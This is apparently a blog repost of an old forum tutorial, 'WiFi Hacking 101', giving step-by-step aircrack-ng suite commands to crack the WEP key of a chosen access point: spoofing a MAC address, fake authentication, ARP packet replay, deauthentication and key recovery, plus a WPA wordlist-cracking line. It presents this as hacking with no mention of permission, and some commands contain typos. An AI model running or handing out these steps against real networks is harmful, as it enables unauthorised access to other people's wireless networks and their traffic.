Tuesday, January 25, 2022

Wi-Fi hacking

  WiFi Hacking 101
O.K folks, in this tut i am going to show you how to crack wep, Sniff non ssl & some ssl passwords over a wireless network & sniffing msn chats

Part. 1, Cracking WEP

my way of cracking wep is a little different than other ways but it gets the job done quicker than everyone else's way

so you will need backtrack 3 and a supported wifi card that can go into monitor mode (i have a ranlink 2500 card (ra0) )

open up a shell

ok so 1st we need to stop our wireless card so we do the airmon command

airmon-ng stop [wifi card extension e.g ath0]

now lets change our mac address

macchanger --mac 00:11:22:33:44:55 [wifi card extension]

now lets fire our card up in monitor mode

airmon-ng start [wifi card extension]

now we need the mac address of the AP we are hacking so lets do

airodump-ng [wifi card extension] now you will see your AP. Take note of the mac address/ BSSID and the channel, now hit CTRL+C to stop airodump jumping channels or you will come into problems later on.

now lets start capturing the data packets we need for the hack so type

airodump-ng -c [channel] -b [bssid/ mac addres of AP] -w [filename] [wifi card extension] so for example

airodump-ng -c 1 -b 01:1b:11:78:d9:f2 -w linksys ra0

once you have done that command you should see some info come up clients, mac address, channel, data ect now you should see the data filling up we need the data to get to about 10-15 thousand to crack the key so we need to speed it up we get a lot of data in a short space of time.

we are now going to use aireplay so open up another shell and type aireplay-ng -1 -0 -a [AP mac address/ bssid] -h [faked mac address] [wifi card extension] for example

aireplay-ng -1 0 -a 02:1b:11:78:d9:f2 -h 00:11:22:33:44:55 ra0

now once you see authentication successful proceed to replay a data packet to the access point which will force it to send out lots of packets we can use to crack the key so do,

aireplay-ng -3 -p 0841 -c FF:FF:FF:FF:FF:FF -b [ap mac address/ bssid] -h [faked mac address] [wifi card extension] for example

aireplay-ng -3 -p 0841 -c FF:FF:FF:FF:FF:FF -b 02:1b:11:78:d9:f2 -h 00:11:22:33:44:55 ra0

now aireplay will start reading the packets and once it finds one you can use for the hack it will prompt you to use that packet? just hit y then enter now on the airodump shell you will see the data filling up very fast ance it gets to 10,000 run this command:

aircrack-ng -b [mac address/ bssid] [file name you used earlier +-01.cap] for example

aircrack-ng -b 02:1b:11:78:d9:f2 linksys-01.cap

and aircrack will start decrypting the packets/ IV's and find the wep key!

if this is your first time doing wep cracking it should take about 10-20 mins at first and you will start progressing to 8 mins, 5 mins, 3 mins ect

other tuts to follow! [[its 03:45am in the uk :O]]

thanks for reading!!

will also get some screen shots up tomorrow.
Last edited by pureh@te; 11-16-2008 at 03:17 AM.

#########

ifconfig rausb0 up
airodump-ng -w capture -c 6 rausb0

aireplay-ng -O 10 -a <mac access point> -c <mac client> rausb0
-O ->deauthenticate attack

aireplay-nh -3 -b <mac access point> -h <mac client> rausb0
-3 ->arp request

aircrack capture02.cap

##########

aircrack-ng -a 2 filename.cap -w wordlist.lst -b AP:MA:CG:OE:SH:ERE
Note.You must capture full cap files with airodump-ng (which means without --ivs option), not just IVs

------------------
Have you tried to manually connect to your AP?

iwconfig eth0 essid <whatever your ssid is>
iwconfig eth0 channel <whatever channel your AP is on>
iwconfig eth0 key <whatever the key is> (if you have WEP turned on)
ifconfig eth0 up

Try that, give it a minute or 2 and then run iwconfig again and post your results.